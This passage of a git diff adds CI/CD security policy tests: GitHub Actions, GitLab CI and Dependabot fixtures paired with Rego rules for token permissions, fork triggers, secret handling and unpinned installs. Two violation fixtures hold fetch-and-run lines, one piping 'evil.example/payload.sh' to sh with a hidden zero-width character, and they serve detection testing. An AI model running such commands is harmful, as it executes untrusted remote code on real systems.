index 0000000..4a3616e
--- /dev/null
+++ b/policies/testdata/ISSUE-304/github/clean_job_perms.yml
@@ -0,0 +1,11 @@
+# Job-level permissions. Expected: 0 findings.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+ - run: make build
diff --git a/policies/testdata/ISSUE-304/github/clean_workflow_perms.yml b/policies/testdata/ISSUE-304/github/clean_workflow_perms.yml
new file mode 100644
index 0000000..6fab1a3
--- /dev/null
+++ b/policies/testdata/ISSUE-304/github/clean_workflow_perms.yml
@@ -0,0 +1,12 @@
+# Workflow-level permissions propagate to every job. Expected: 0.
+name: Build
+on: [push]
+
+permissions:
+ contents: read
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make build
diff --git a/policies/testdata/ISSUE-304/github/violation_no_perms.yml b/policies/testdata/ISSUE-304/github/violation_no_perms.yml
new file mode 100644
index 0000000..5534e26
--- /dev/null
+++ b/policies/testdata/ISSUE-304/github/violation_no_perms.yml
@@ -0,0 +1,10 @@
+# No permissions block at either level β token inherits the repo
+# default. Expected: 1 finding.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: make build
diff --git a/policies/testdata/ISSUE-305/github/clean_ci_with_secret.yml b/policies/testdata/ISSUE-305/github/clean_ci_with_secret.yml
new file mode 100644
index 0000000..285a83c
--- /dev/null
+++ b/policies/testdata/ISSUE-305/github/clean_ci_with_secret.yml
@@ -0,0 +1,15 @@
+# Plain CI job that reads a secret (CODECOV_TOKEN) but has no
+# deploy context β no release trigger, no publish action. Stays
+# silent to avoid flagging every CI workflow. Expected: 0.
+name: CI
+on: [push]
+
+jobs:
+ test:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: npm test
+ - run: ./upload-coverage.sh
+ env:
+ CODECOV_TOKEN: ${{ secrets.CODECOV_TOKEN }}
diff --git a/policies/testdata/ISSUE-305/github/clean_with_env.yml b/policies/testdata/ISSUE-305/github/clean_with_env.yml
new file mode 100644
index 0000000..06d20cf
--- /dev/null
+++ b/policies/testdata/ISSUE-305/github/clean_with_env.yml
@@ -0,0 +1,13 @@
+# Environment: production gates the deploy β required reviewers /
+# wait timers are configurable on the environment. Expected: 0.
+name: Publish
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ environment: production
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - run: twine upload --password ${{ secrets.PYPI_API_TOKEN }} dist/*
diff --git a/policies/testdata/ISSUE-305/github/violation_release.yml b/policies/testdata/ISSUE-305/github/violation_release.yml
new file mode 100644
index 0000000..7ec7af1
--- /dev/null
+++ b/policies/testdata/ISSUE-305/github/violation_release.yml
@@ -0,0 +1,13 @@
+# Release-triggered publish job uses a PyPI token but declares no
+# environment: β no reviewer stands between release and the token.
+# Expected: 1 finding.
+name: Publish
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - run: twine upload --password ${{ secrets.PYPI_API_TOKEN }} dist/*
diff --git a/policies/testdata/ISSUE-306/github/clean_default.yml b/policies/testdata/ISSUE-306/github/clean_default.yml
new file mode 100644
index 0000000..891924c
--- /dev/null
+++ b/policies/testdata/ISSUE-306/github/clean_default.yml
@@ -0,0 +1,13 @@
+name: Release
+on: [workflow_dispatch]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/create-github-app-token@v1
+ id: app-token
+ with:
+ app-id: ${{ vars.APP_ID }}
+ private-key: ${{ secrets.APP_PRIVATE_KEY }}
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-306/github/violation_skip_revoke.yml b/policies/testdata/ISSUE-306/github/violation_skip_revoke.yml
new file mode 100644
index 0000000..8fed0b0
--- /dev/null
+++ b/policies/testdata/ISSUE-306/github/violation_skip_revoke.yml
@@ -0,0 +1,14 @@
+name: Release
+on: [workflow_dispatch]
+
+jobs:
+ release:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/create-github-app-token@v1
+ id: app-token
+ with:
+ app-id: ${{ vars.APP_ID }}
+ private-key: ${{ secrets.APP_PRIVATE_KEY }}
+ skip-token-revoke: true
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-307/github/clean_credentials_disabled.yml b/policies/testdata/ISSUE-307/github/clean_credentials_disabled.yml
new file mode 100644
index 0000000..5bff626
--- /dev/null
+++ b/policies/testdata/ISSUE-307/github/clean_credentials_disabled.yml
@@ -0,0 +1,12 @@
+# Checkout explicitly disables credential persistence. Expected: 0 findings.
+name: Safe checkout
+on: push
+
+jobs:
+ safe-clone:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ persist-credentials: false
+ - run: echo "built"
diff --git a/policies/testdata/ISSUE-307/github/violation_default_checkout.yml b/policies/testdata/ISSUE-307/github/violation_default_checkout.yml
new file mode 100644
index 0000000..cc01bf5
--- /dev/null
+++ b/policies/testdata/ISSUE-307/github/violation_default_checkout.yml
@@ -0,0 +1,11 @@
+# Default actions/checkout persists GITHUB_TOKEN in .git/config.
+# Expected: 1 finding on clone.
+name: Default checkout
+on: push
+
+jobs:
+ clone:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: echo "built"
diff --git a/policies/testdata/ISSUE-308/github/clean_literal_quoted.yml b/policies/testdata/ISSUE-308/github/clean_literal_quoted.yml
new file mode 100644
index 0000000..b1eeab6
--- /dev/null
+++ b/policies/testdata/ISSUE-308/github/clean_literal_quoted.yml
@@ -0,0 +1,13 @@
+# Safe forms: secrets.NAME or secrets['NAME'] with a quoted literal.
+# Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - env:
+ API_TOKEN: ${{ secrets.API_TOKEN }}
+ CI_TOKEN: ${{ secrets['CI_TOKEN'] }}
+ run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-308/github/violation_secrets_env_index.yml b/policies/testdata/ISSUE-308/github/violation_secrets_env_index.yml
new file mode 100644
index 0000000..58e3c9a
--- /dev/null
+++ b/policies/testdata/ISSUE-308/github/violation_secrets_env_index.yml
@@ -0,0 +1,17 @@
+# secrets[env.OSC_ACCESS_KEY_NAME] β dynamic index. Which secret is
+# read depends on the env binding; not visible from the workflow alone.
+# Expected: 1 finding on e2e.
+name: E2E
+on: [push]
+
+jobs:
+ e2e:
+ runs-on: ubuntu-latest
+ env:
+ OSC_ACCESS_KEY_NAME: PROD_AK
+ OSC_SECRET_KEY_NAME: PROD_SK
+ steps:
+ - env:
+ OSC_ACCESS_KEY: ${{ secrets[env.OSC_ACCESS_KEY_NAME] }}
+ OSC_SECRET_KEY: ${{ secrets[env.OSC_SECRET_KEY_NAME] }}
+ run: ./run-e2e.sh
diff --git a/policies/testdata/ISSUE-401/gitlab/violation_hardcoded.gitlab-ci.yml b/policies/testdata/ISSUE-401/gitlab/violation_hardcoded.gitlab-ci.yml
new file mode 100644
index 0000000..1753281
--- /dev/null
+++ b/policies/testdata/ISSUE-401/gitlab/violation_hardcoded.gitlab-ci.yml
@@ -0,0 +1,4 @@
+build:
+ image: alpine:3.19
+ script:
+ - echo build
diff --git a/policies/testdata/ISSUE-410/gitlab/clean.gitlab-ci.yml b/policies/testdata/ISSUE-410/gitlab/clean.gitlab-ci.yml
new file mode 100644
index 0000000..2854282
--- /dev/null
+++ b/policies/testdata/ISSUE-410/gitlab/clean.gitlab-ci.yml
@@ -0,0 +1,5 @@
+sast:
+ stage: test
+ image: alpine:3.19
+ script:
+ - echo SAST
diff --git a/policies/testdata/ISSUE-410/gitlab/violation_allow_failure.gitlab-ci.yml b/policies/testdata/ISSUE-410/gitlab/violation_allow_failure.gitlab-ci.yml
new file mode 100644
index 0000000..a9d0966
--- /dev/null
+++ b/policies/testdata/ISSUE-410/gitlab/violation_allow_failure.gitlab-ci.yml
@@ -0,0 +1,6 @@
+sast:
+ stage: test
+ image: alpine:3.19
+ allow_failure: true
+ script:
+ - echo SAST
diff --git a/policies/testdata/ISSUE-410/gitlab/violation_manual.gitlab-ci.yml b/policies/testdata/ISSUE-410/gitlab/violation_manual.gitlab-ci.yml
new file mode 100644
index 0000000..f120971
--- /dev/null
+++ b/policies/testdata/ISSUE-410/gitlab/violation_manual.gitlab-ci.yml
@@ -0,0 +1,6 @@
+sast:
+ stage: test
+ image: alpine:3.19
+ when: manual
+ script:
+ - echo SAST
diff --git a/policies/testdata/ISSUE-411/gitlab/clean_checksum.gitlab-ci.yml b/policies/testdata/ISSUE-411/gitlab/clean_checksum.gitlab-ci.yml
new file mode 100644
index 0000000..2180db3
--- /dev/null
+++ b/policies/testdata/ISSUE-411/gitlab/clean_checksum.gitlab-ci.yml
@@ -0,0 +1,4 @@
+install:
+ image: alpine:3.19
+ script:
+ - curl -sSL https://example.com/install.sh -o install.sh && sha256sum -c install.sha256 && bash install.sh
diff --git a/policies/testdata/ISSUE-411/gitlab/violation_pipe_to_shell.gitlab-ci.yml b/policies/testdata/ISSUE-411/gitlab/violation_pipe_to_shell.gitlab-ci.yml
new file mode 100644
index 0000000..eba5bac
--- /dev/null
+++ b/policies/testdata/ISSUE-411/gitlab/violation_pipe_to_shell.gitlab-ci.yml
@@ -0,0 +1,4 @@
+install:
+ image: alpine:3.19
+ script:
+ - curl -sSL https://example.com/install.sh | bash
diff --git a/policies/testdata/ISSUE-412/gitlab/clean_kaniko.gitlab-ci.yml b/policies/testdata/ISSUE-412/gitlab/clean_kaniko.gitlab-ci.yml
new file mode 100644
index 0000000..81b0a08
--- /dev/null
+++ b/policies/testdata/ISSUE-412/gitlab/clean_kaniko.gitlab-ci.yml
@@ -0,0 +1,8 @@
+stages:
+ - build
+
+build:
+ stage: build
+ image: gcr.io/kaniko-project/executor:v1
+ script:
+ - /kaniko/executor
diff --git a/policies/testdata/ISSUE-412/gitlab/violation_dind.gitlab-ci.yml b/policies/testdata/ISSUE-412/gitlab/violation_dind.gitlab-ci.yml
new file mode 100644
index 0000000..5dbe1f3
--- /dev/null
+++ b/policies/testdata/ISSUE-412/gitlab/violation_dind.gitlab-ci.yml
@@ -0,0 +1,10 @@
+stages:
+ - build
+
+docker-build:
+ stage: build
+ image: docker:27
+ services:
+ - docker:27-dind
+ script:
+ - docker build .
diff --git a/policies/testdata/ISSUE-413/gitlab/clean_tls_enabled.gitlab-ci.yml b/policies/testdata/ISSUE-413/gitlab/clean_tls_enabled.gitlab-ci.yml
new file mode 100644
index 0000000..312020f
--- /dev/null
+++ b/policies/testdata/ISSUE-413/gitlab/clean_tls_enabled.gitlab-ci.yml
@@ -0,0 +1,8 @@
+docker-build:
+ image: docker:27
+ services:
+ - docker:27-dind
+ variables:
+ DOCKER_TLS_CERTDIR: "/certs"
+ script:
+ - docker build .
diff --git a/policies/testdata/ISSUE-413/gitlab/violation_tls_disabled.gitlab-ci.yml b/policies/testdata/ISSUE-413/gitlab/violation_tls_disabled.gitlab-ci.yml
new file mode 100644
index 0000000..fa8d9d9
--- /dev/null
+++ b/policies/testdata/ISSUE-413/gitlab/violation_tls_disabled.gitlab-ci.yml
@@ -0,0 +1,8 @@
+docker-build:
+ image: docker:27
+ services:
+ - docker:27-dind
+ variables:
+ DOCKER_TLS_CERTDIR: ""
+ script:
+ - docker build .
diff --git a/policies/testdata/ISSUE-414/github/clean_pull_request.yml b/policies/testdata/ISSUE-414/github/clean_pull_request.yml
new file mode 100644
index 0000000..fe97040
--- /dev/null
+++ b/policies/testdata/ISSUE-414/github/clean_pull_request.yml
@@ -0,0 +1,14 @@
+# Standard pull_request and push triggers run without access to the
+# base repo's secrets on forks, so they are not subject to the same
+# privilege-escalation risk. Expected: 0 findings.
+name: Standard PR
+on:
+ pull_request:
+ push:
+ branches: [main]
+
+jobs:
+ ci:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "ci"
diff --git a/policies/testdata/ISSUE-414/github/violation_pull_request_target.yml b/policies/testdata/ISSUE-414/github/violation_pull_request_target.yml
new file mode 100644
index 0000000..3607130
--- /dev/null
+++ b/policies/testdata/ISSUE-414/github/violation_pull_request_target.yml
@@ -0,0 +1,15 @@
+# pull_request_target gives the workflow the base repo's token and
+# secrets while being trivially influenceable by the PR author. The
+# moment the workflow checks out the PR head or runs fork code,
+# secrets leak. Expected: 1 finding on preview.
+name: PR preview
+on:
+ pull_request_target:
+ types: [opened, synchronize]
+
+jobs:
+ preview:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: echo "preview"
diff --git a/policies/testdata/ISSUE-414/github/violation_workflow_run.yml b/policies/testdata/ISSUE-414/github/violation_workflow_run.yml
new file mode 100644
index 0000000..4d12f5a
--- /dev/null
+++ b/policies/testdata/ISSUE-414/github/violation_workflow_run.yml
@@ -0,0 +1,13 @@
+# workflow_run runs with secrets regardless of the originating
+# workflow's trust boundary. Expected: 1 finding on post.
+name: After CI
+on:
+ workflow_run:
+ workflows: [CI]
+ types: [completed]
+
+jobs:
+ post:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "post-run"
diff --git a/policies/testdata/ISSUE-415/github/clean_no_ref.yml b/policies/testdata/ISSUE-415/github/clean_no_ref.yml
new file mode 100644
index 0000000..466b644
--- /dev/null
+++ b/policies/testdata/ISSUE-415/github/clean_no_ref.yml
@@ -0,0 +1,12 @@
+# pull_request_target but no explicit ref: β checkout falls back to
+# the base-repo SHA. No fork code in this run. Still caught by
+# ISSUE-414 but not by this narrower rule. Expected: 0 ISSUE-415.
+name: Label
+on: [pull_request_target]
+
+jobs:
+ label:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: gh pr edit --add-label automated
diff --git a/policies/testdata/ISSUE-415/github/violation_head_sha.yml b/policies/testdata/ISSUE-415/github/violation_head_sha.yml
new file mode 100644
index 0000000..43511a1
--- /dev/null
+++ b/policies/testdata/ISSUE-415/github/violation_head_sha.yml
@@ -0,0 +1,14 @@
+# pull_request_target + explicit checkout of the PR head SHA.
+# Shell steps that run after the checkout see fork-controlled code
+# with base-repo secrets. Expected: 1 finding.
+name: PR Preview
+on: [pull_request_target]
+
+jobs:
+ preview:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ with:
+ ref: ${{ github.event.pull_request.head.sha }}
+ - run: npm install && npm test
diff --git a/policies/testdata/ISSUE-509/github/clean_minimal.yml b/policies/testdata/ISSUE-509/github/clean_minimal.yml
new file mode 100644
index 0000000..4f30cda
--- /dev/null
+++ b/policies/testdata/ISSUE-509/github/clean_minimal.yml
@@ -0,0 +1,13 @@
+# Explicit minimal permissions declared at workflow level.
+# Expected: 0 findings.
+name: Minimal
+on: push
+
+permissions:
+ contents: read
+
+jobs:
+ check:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "ok"
diff --git a/policies/testdata/ISSUE-509/github/violation_job_write_all.yml b/policies/testdata/ISSUE-509/github/violation_job_write_all.yml
new file mode 100644
index 0000000..7aaff52
--- /dev/null
+++ b/policies/testdata/ISSUE-509/github/violation_job_write_all.yml
@@ -0,0 +1,18 @@
+# Only one job opts into write-all. The other is restricted to contents:read.
+# Expected: 1 finding on loose.
+name: Job-level override
+on: push
+
+jobs:
+ restricted:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ steps:
+ - run: echo "ok"
+
+ loose:
+ runs-on: ubuntu-latest
+ permissions: write-all
+ steps:
+ - run: echo "loose"
diff --git a/policies/testdata/ISSUE-509/github/violation_workflow_write_all.yml b/policies/testdata/ISSUE-509/github/violation_workflow_write_all.yml
new file mode 100644
index 0000000..17bc648
--- /dev/null
+++ b/policies/testdata/ISSUE-509/github/violation_workflow_write_all.yml
@@ -0,0 +1,12 @@
+# Workflow-level permissions: write-all propagates to every job.
+# Expected: 1 finding on publish.
+name: Too broad
+on: push
+
+permissions: write-all
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo "publish"
diff --git a/policies/testdata/ISSUE-601/github/clean_named.yml b/policies/testdata/ISSUE-601/github/clean_named.yml
new file mode 100644
index 0000000..f548b6c
--- /dev/null
+++ b/policies/testdata/ISSUE-601/github/clean_named.yml
@@ -0,0 +1,10 @@
+# Explicit top-level name: stable identifier for the Actions UI,
+# PR checks, required-status-checks, audit log. Expected: 0 findings.
+name: Build and Test
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-601/github/violation_unnamed.yml b/policies/testdata/ISSUE-601/github/violation_unnamed.yml
new file mode 100644
index 0000000..e935c3f
--- /dev/null
+++ b/policies/testdata/ISSUE-601/github/violation_unnamed.yml
@@ -0,0 +1,10 @@
+# No top-level `name:` β GitHub uses the file path as the display
+# identifier. Required-status-check settings that reference the file
+# path will silently break if the file is renamed. Expected: 1.
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - run: echo build
diff --git a/policies/testdata/ISSUE-602/github/clean_job_concurrency.yml b/policies/testdata/ISSUE-602/github/clean_job_concurrency.yml
new file mode 100644
index 0000000..dfc3315
--- /dev/null
+++ b/policies/testdata/ISSUE-602/github/clean_job_concurrency.yml
@@ -0,0 +1,12 @@
+# Job-level concurrency also counts as "covered". Expected: 0.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ concurrency:
+ group: deploy-${{ github.ref }}
+ cancel-in-progress: false
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-602/github/clean_workflow_concurrency.yml b/policies/testdata/ISSUE-602/github/clean_workflow_concurrency.yml
new file mode 100644
index 0000000..3706e68
--- /dev/null
+++ b/policies/testdata/ISSUE-602/github/clean_workflow_concurrency.yml
@@ -0,0 +1,14 @@
+# Workflow-level concurrency: concurrent pushes on the same ref get
+# the newer run cancelled/superseded. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref }}
+ cancel-in-progress: true
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-602/github/violation_no_concurrency.yml b/policies/testdata/ISSUE-602/github/violation_no_concurrency.yml
new file mode 100644
index 0000000..91e036e
--- /dev/null
+++ b/policies/testdata/ISSUE-602/github/violation_no_concurrency.yml
@@ -0,0 +1,10 @@
+# No concurrency block at either level β successive pushes on the
+# same branch race on caches and external state. Expected: 1 finding.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-603/github/clean_scoped_path.yml b/policies/testdata/ISSUE-603/github/clean_scoped_path.yml
new file mode 100644
index 0000000..ac5e190
--- /dev/null
+++ b/policies/testdata/ISSUE-603/github/clean_scoped_path.yml
@@ -0,0 +1,14 @@
+# path scoped to the build output directory only. Expected: 0.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: make build
+ - uses: actions/upload-artifact@v4
+ with:
+ name: bin
+ path: dist/
diff --git a/policies/testdata/ISSUE-603/github/violation_dot.yml b/policies/testdata/ISSUE-603/github/violation_dot.yml
new file mode 100644
index 0000000..ad8cf3e
--- /dev/null
+++ b/policies/testdata/ISSUE-603/github/violation_dot.yml
@@ -0,0 +1,15 @@
+# upload-artifact with path=. bundles .git/ β if checkout persisted
+# the token (ISSUE-307) it leaks. Expected: 1 finding.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: make build
+ - uses: actions/upload-artifact@v4
+ with:
+ name: workspace
+ path: .
diff --git a/policies/testdata/ISSUE-603/github/violation_workspace.yml b/policies/testdata/ISSUE-603/github/violation_workspace.yml
new file mode 100644
index 0000000..8c93949
--- /dev/null
+++ b/policies/testdata/ISSUE-603/github/violation_workspace.yml
@@ -0,0 +1,13 @@
+# Same pitfall, dressed up as ${{ github.workspace }}. Expected: 1.
+name: Build
+on: [push]
+
+jobs:
+ build:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - uses: actions/upload-artifact@v4
+ with:
+ name: ws
+ path: ${{ github.workspace }}
diff --git a/policies/testdata/ISSUE-604/github/clean.yml b/policies/testdata/ISSUE-604/github/clean.yml
new file mode 100644
index 0000000..e526264
--- /dev/null
+++ b/policies/testdata/ISSUE-604/github/clean.yml
@@ -0,0 +1,9 @@
+# Pure ASCII workflow. Expected: 0 findings.
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: ./deploy.sh
diff --git a/policies/testdata/ISSUE-604/github/violation_zero_width.yml b/policies/testdata/ISSUE-604/github/violation_zero_width.yml
new file mode 100644
index 0000000..30365ff
--- /dev/null
+++ b/policies/testdata/ISSUE-604/github/violation_zero_width.yml
@@ -0,0 +1,8 @@
+name: Deploy
+on: [push]
+
+jobs:
+ deploy:
+ runs-on: ubuntu-latest
+ steps:
+ - run: curlβhttps://evil.example/payload.sh | sh
diff --git a/policies/testdata/ISSUE-605/github/clean_oidc.yml b/policies/testdata/ISSUE-605/github/clean_oidc.yml
new file mode 100644
index 0000000..08e811f
--- /dev/null
+++ b/policies/testdata/ISSUE-605/github/clean_oidc.yml
@@ -0,0 +1,14 @@
+# No password: input β OIDC trusted publishing (permission
+# id-token: write declared at job level). Expected: 0 findings.
+name: Publish
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ permissions:
+ id-token: write
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
diff --git a/policies/testdata/ISSUE-605/github/violation_pypi_static.yml b/policies/testdata/ISSUE-605/github/violation_pypi_static.yml
new file mode 100644
index 0000000..e338310
--- /dev/null
+++ b/policies/testdata/ISSUE-605/github/violation_pypi_static.yml
@@ -0,0 +1,15 @@
+# pypa/gh-action-pypi-publish with a static token. Long-lived secret,
+# no repo/workflow scoping β trusted publishing would close this.
+# Expected: 1 finding.
+name: Publish
+on: [release]
+
+jobs:
+ publish:
+ runs-on: ubuntu-latest
+ steps:
+ - uses: actions/checkout@v4
+ - run: python -m build
+ - uses: pypa/gh-action-pypi-publish@v1
+ with:
+ password: ${{ secrets.PYPI_API_TOKEN }}
diff --git a/policies/testdata/ISSUE-606/github/clean.yml b/policies/testdata/ISSUE-606/github/clean.yml
new file mode 100644
index 0000000..1fb0b58
--- /dev/null
+++ b/policies/testdata/ISSUE-606/github/clean.yml
@@ -0,0 +1,6 @@
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule:
+ interval: daily
diff --git a/policies/testdata/ISSUE-606/github/violation_allow.yml b/policies/testdata/ISSUE-606/github/violation_allow.yml
new file mode 100644
index 0000000..65743f8
--- /dev/null
+++ b/policies/testdata/ISSUE-606/github/violation_allow.yml
@@ -0,0 +1,11 @@
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule:
+ interval: daily
+ insecure-external-code-execution: allow
+ - package-ecosystem: pip
+ directory: /
+ schedule:
+ interval: daily
diff --git a/policies/testdata/ISSUE-607/github/clean_with_cooldown.yml b/policies/testdata/ISSUE-607/github/clean_with_cooldown.yml
new file mode 100644
index 0000000..6bbc016
--- /dev/null
+++ b/policies/testdata/ISSUE-607/github/clean_with_cooldown.yml
@@ -0,0 +1,11 @@
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule:
+ interval: daily
+ cooldown:
+ default-days: 3
+ semver-major-days: 7
+ include:
+ - "*"
diff --git a/policies/testdata/ISSUE-607/github/violation_no_cooldown.yml b/policies/testdata/ISSUE-607/github/violation_no_cooldown.yml
new file mode 100644
index 0000000..883d6c4
--- /dev/null
+++ b/policies/testdata/ISSUE-607/github/violation_no_cooldown.yml
@@ -0,0 +1,10 @@
+version: 2
+updates:
+ - package-ecosystem: npm
+ directory: /
+ schedule:
+ interval: daily
+ - package-ecosystem: pip
+ directory: /
+ schedule:
+ interval: daily
diff --git a/policies/testmain_test.go b/policies/testmain_test.go
new file mode 100644
index 0000000..60e80db
--- /dev/null
+++ b/policies/testmain_test.go
@@ -0,0 +1,18 @@
+package policies_test
+
+import (
+ "os"
+ "testing"
+)
+
+// TestMain short-circuits the collector's GitHub API enrichment
+// globally for the test suite. Unit tests drive the collector on
+// temp fixtures that reference public actions like `actions/
+// checkout@v4` β we do not want each fixture to trigger live API
+// calls. Production binaries ignore this env var.
+func TestMain(m *testing.M) {
+ if err := os.Setenv("PLUMBER_DISABLE_GITHUB_API", "1"); err != nil {
+ panic(err)
+ }
+ os.Exit(m.Run())
+}
diff --git a/policies/undocumented_permissions.rego b/policies/undocumented_permissions.rego
new file mode 100644
index 0000000..2cb2a68
--- /dev/null
+++ b/policies/undocumented_permissions.rego
@@ -0,0 +1,32 @@
+# undocumented-permissions β flag jobs that run with no explicit
+# `permissions:` block at either the workflow or job level. When
+# neither layer declares permissions, the GITHUB_TOKEN falls back to
+# the repository-wide default β often `contents: write` or
+# `read-all` β and every step gets more authority than it needs.
+# Any compromise (unpinned action, template-injection, cache
+# poisoning) inherits that default.
+#
+# The collector materialises the effective permissions on each job:
+# job-level first, falling back to workflow-level. When both are
+# absent, `permissions` is nil / missing from the JSON, which is
+# exactly what this policy looks for.
+#
+# GitHub Actions only β the `permissions:` keyword does not exist in
+# GitLab CI, so applying this rule there would flag every GitLab job
+# as a false positive.
+package undocumented_permissions
+
+import rego.v1
+
+deny contains finding if {
+ input.pipeline.provider == "github"
+ some i
+ job := input.pipeline.jobs[i]
+ not job.permissions
+ finding := {
+ "code": "ISSUE-304",
+ "severity": "medium",
+ "message": sprintf("job %q runs with no explicit `permissions:` block β the GITHUB_TOKEN inherits the repository default scope", [job.name]),
+ "job": job.name,
+ }
+}
diff --git a/policies/unpinned_package_install.rego b/policies/unpinned_package_install.rego
new file mode 100644
index 0000000..7ee3139
--- /dev/null
+++ b/policies/unpinned_package_install.rego
@@ -0,0 +1,48 @@
+# unpinned-package-install β flag `run:` steps that invoke a
+# package manager against a single package name without pinning
+# a version (pip install pkg==1.2.3) and without a lockfile-based
+# install (pip install -r requirements.txt, npm ci). The window
+# between runs then resolves whatever the registry serves at
+# execution time β the exact surface typosquat and maintainer-
+# account compromise attacks exploit.
+#
+# Narrow by design: flags only `pip install pkg` / `npm install
+# pkg` when the package name is the first and only argument.
+# Commands with flags (`-r`, `--require-hashes`, `-e .`, `-c`) or
+# lockfile-based commands (`npm ci`) stay silent. The intent is to
+# catch the shape typosquats live on, not every flagged variation.
+package unpinned_package_install
+
+import rego.v1
+
+bare_pip_install_pattern := `(?m)^\s*(?:python[0-9.]*\s+-m\s+)?pip(?:3)?\s+install\s+[A-Za-z_][A-Za-z0-9._-]*\s*$`
+
+# Inline pin `pip install pkg==1.2.3` keeps the command silent.
+pip_pinned_pattern := `\bpip(?:3)?\s+install\s+[A-Za-z_][A-Za-z0-9._-]*==`
+
+bare_npm_install_pattern := `(?m)^\s*npm\s+install\s+(?:@[a-zA-Z0-9-]+/)?[a-zA-Z][a-zA-Z0-9._-]*\s*$`
+
+npm_pinned_pattern := `\bnpm\s+install\s+(?:@[a-zA-Z0-9-]+/)?[a-zA-Z0-9._-]+@[0-9^~>=<]`
+
+deny contains finding if {
+ some i, j
+ job := input.pipeline.jobs[i]
+ script := job.scripts[j]
+ _unpinned_package_install(script)
+ finding := {
+ "code": "ISSUE-214",
+ "severity": "medium",
+ "message": sprintf("job %q installs a package without a pinned version or lockfile β add `==X.Y.Z` / `@X.Y.Z` or switch to `pip install -r requirements.txt` / `npm ci`", [job.name]),
+ "job": job.name,
+ }
+}
+
+_unpinned_package_install(script) if {
+ regex.match(bare_pip_install_pattern, script)
+ not regex.match(pip_pinned_pattern, script)
+}
+
+_unpinned_package_install(script) if {
+ regex.match(bare_npm_install_pattern, script)
+ not regex.match(npm_pinned_pattern, script)
+}
diff --git a/policies/unredacted_secrets.rego b/policies/unredacted_secrets.rego
new file mode 100644
index 0000000..40cb906
--- /dev/null
+++ b/policies/unredacted_secrets.rego
@@ -0,0 +1,51 @@
+# unredacted-secrets β flag workflows that deserialise a secret via
+# fromJSON and reference one of its sub-fields. GitHub's runtime log
+# redaction works on known secret strings (those declared in the
+# secrets store). Once `fromJSON(secrets.X).y` evaluates, the inner
+# field is a brand-new string the runtime has never seen, so every
+# subsequent print / log / HTTP header leaks it verbatim.
+#
+# The check looks for the pattern `fromJSON(secrets.β¦).` across
+# scripts, env bindings and `with:` inputs. The bare
+# `fromJSON(secrets.X)` form that stays inside an opaque object β no
+# `.y` dereference on the same line β is not flagged; only the
+# projection leaks.
+package unredacted_secrets
+
+import rego.v1
+
+# Whitespace tolerated around fromJSON / secrets; trailing `.ident`
+# required so the bare `fromJSON(secrets.X)` with no projection stays
+# silent. Case-insensitive for the fromJSON keyword since GitHub
+# accepts both `fromJson` and `fromJSON`.
+unredacted_pattern := `(?i)fromJSON\s*\(\s*secrets\.[A-Za-z_][A-Za-z0-9_]*\s*\)\s*\.[A-Za-z_]`
+
+deny contains finding if {
+ some i
+ job := input.pipeline.jobs[i]
+ _job_unredacts_secrets(job)
+ finding := {
+ "code": "ISSUE-303",
+ "severity": "high",
+ "message": sprintf("job %q dereferences a secret via fromJSON β GitHub cannot redact the resulting sub-fields from job logs", [job.name]),
+ "job": job.name,
+ }
+}
+
